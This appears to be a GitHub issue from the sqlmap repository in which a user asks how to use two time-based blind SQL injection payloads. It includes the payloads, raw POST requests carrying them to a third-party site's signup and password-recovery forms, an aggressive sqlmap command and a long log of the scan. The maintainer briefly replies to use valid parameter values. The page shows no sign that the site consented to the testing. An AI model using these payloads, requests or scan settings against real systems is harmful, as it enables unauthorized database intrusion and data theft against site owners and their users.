search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
32.02k stars 5.68k forks source link

How to use this payloads #1633

Closed ghost closed 8 years ago

ghost commented 8 years ago

1) if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/ 2) (select(0)from(select(sleep(0)))v)/'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/

Resuests: 1) POST /lost.php HTTP/1.1 Content-Length: 150 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://www.site.ru/ Cookie: PHPSESSID=db5t7hrvhl32iu6e5ur9v6pdd2; defltlang=1 Host: www.site.ru Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: /

email=if(now()%3dsysdate()%2csleep(0)%2c0)/'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22/&form=sent

2) POST /signup.php HTTP/1.1 Content-Length: 402 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://www.site.ru/ Cookie: PHPSESSID=db5t7hrvhl32iu6e5ur9v6pdd2; defltlang=1 Host: www.site.ru Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: /

allow_emails=yes&canpay=1&confirmcode=g00dPa%24%24w0rD&email1=(select(0)from(select(sleep(0)))v)/'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22_/&email2=sample%40email.tst&form=sent&lang=English&name=anmkklor&passb=g00dPa%24%24w0rD&passwd=g00dPa%24%24w0rD&pay_to=3&receive_paidmail=0&send_weekly_stat=no&sitename=anmkklor&site_lang=1&termscheck=1&url=http://

Log SQLMAP: sqlmap.py -r af.txt -p email1 --random-agent --dbms=mysql --level 5 --risk 3

     _

**| |_ {1.0-dev-nongit-20151211} |_ -| . | | | .'| . | || |||||**,| | || |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program

[*] starting at 18:52:38

[18:52:38] [INFO] parsing HTTP request from 'af.txt' [18:52:38] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap\txt \user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (K HTML, like Gecko) Chrome/4.0.203.0 Safari/532.0' [18:52:38] [WARNING] provided value for parameter 'email1' is empty. Please, alw ays use only valid parameter values so sqlmap could be able to run properly [18:52:38] [INFO] testing connection to the target URL [18:52:38] [INFO] heuristics detected web page charset 'windows-1251' [18:52:39] [INFO] testing if the target URL is stable. This can take a couple of seconds [18:52:40] [WARNING] target URL is not stable. sqlmap will base the page compari son on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c [18:52:42] [WARNING] heuristic (basic) test shows that POST parameter 'email1' m ight not be injectable [18:52:43] [INFO] heuristic (XSS) test shows that POST parameter 'email1' might be vulnerable to XSS attacks [18:52:43] [INFO] testing for SQL injection on POST parameter 'email1' [18:52:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [18:52:43] [WARNING] reflective value(s) found and filtering out [18:53:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' [18:54:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen eric comment)' [18:55:23] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Gene ric comment)' [18:56:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS QL comment)' [18:57:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ L comment)' [18:58:27] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDE R BY or GROUP BY clause' [18:59:07] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' [19:00:21] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER B Y or GROUP BY clause (MAKE_SET)' [19:01:03] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' [19:02:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go ing to retry the request [19:02:11] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER B Y or GROUP BY clause (ELT)' [19:02:53] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool_int)' [19:03:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER B Y or GROUP BY clause (bool_int)' [19:04:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'

[19:04:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' [19:04:45] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace' [19:04:46] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace ( original value)' [19:04:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S ET)' [19:04:47] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S ET - original value)' [19:04:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)' [19:04:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)' [19:04:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool_i nt)' [19:04:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool_i nt - original value)' [19:04:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [19:04:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' [19:04:59] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [19:05:00] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' [19:05:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries' [19:05:55] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries' [19:07:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause' [19:07:23] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' [19:07:42] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (EXTRACTVALUE)' [19:08:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [19:08:25] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (UPDATEXML)' [19:08:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [19:09:42] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go ing to retry the request [19:09:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (BIGINT UNSIGNED)' [19:10:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B IGINT UNSIGNED)' [19:10:24] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause' [19:10:46] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause' [19:11:30] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' [19:12:08] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT VALUE)' [19:12:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' [19:12:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT VALUE)' [19:12:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX ML)' [19:12:39] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' [19:12:39] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'

[19:12:45] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)' [19:12:54] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)' [19:12:54] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)' [19:12:55] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'

[19:12:56] [INFO] testing 'MySQL inline queries' [19:12:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' [19:13:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)' [19:14:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' [19:14:36] [INFO] testing 'MySQL > 5.0.11 stacked queries' [19:15:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment )' [19:15:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [19:16:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' [19:17:05] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)' [19:17:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - commen t)' [19:18:44] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment )' [19:20:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' [19:20:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind' [19:21:43] [INFO] POST parameter 'email1' seems to be 'MySQL >= 5.0.12 OR time-b ased blind' injectable [19:21:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [19:21:43] [INFO] automatically extending ranges for UNION query injection techn ique tests as there is at least one other (potential) technique found [19:22:03] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns ' [19:22:22] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns' [19:22:28] [INFO] testing 'Generic UNION query (random number) - 22 to 40 column s' [19:22:31] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns' [19:22:36] [INFO] testing 'Generic UNION query (random number) - 42 to 60 column s' [19:22:58] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns' [19:23:11] [INFO] testing 'Generic UNION query (random number) - 62 to 80 column s' [19:23:20] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns' [19:23:27] [INFO] testing 'Generic UNION query (random number) - 82 to 100 colum ns' [19:23:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [19:23:48] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns' [19:23:54] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns' [19:24:09] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'

[19:24:15] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns' [19:24:21] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'

[19:24:31] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns' [19:24:38] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'

[19:24:45] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns' [19:25:00] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns ' [19:25:09] [INFO] checking if the injection point on POST parameter 'email1' is a false positive [19:25:09] [WARNING] false positive or unexploitable injection point detected [19:25:09] [WARNING] POST parameter 'email1' is not injectable [19:25:09] [CRITICAL] all tested parameters appear to be not injectable. Also, y ou can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism invol ved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=s pace2comment') [19:25:09] [WARNING] HTTP error codes detected during run: 424 (?) - 2610 times

[*] shutting down at 19:25:09

stamparm commented 8 years ago

Always use only valid parameter values (not SQLi in them)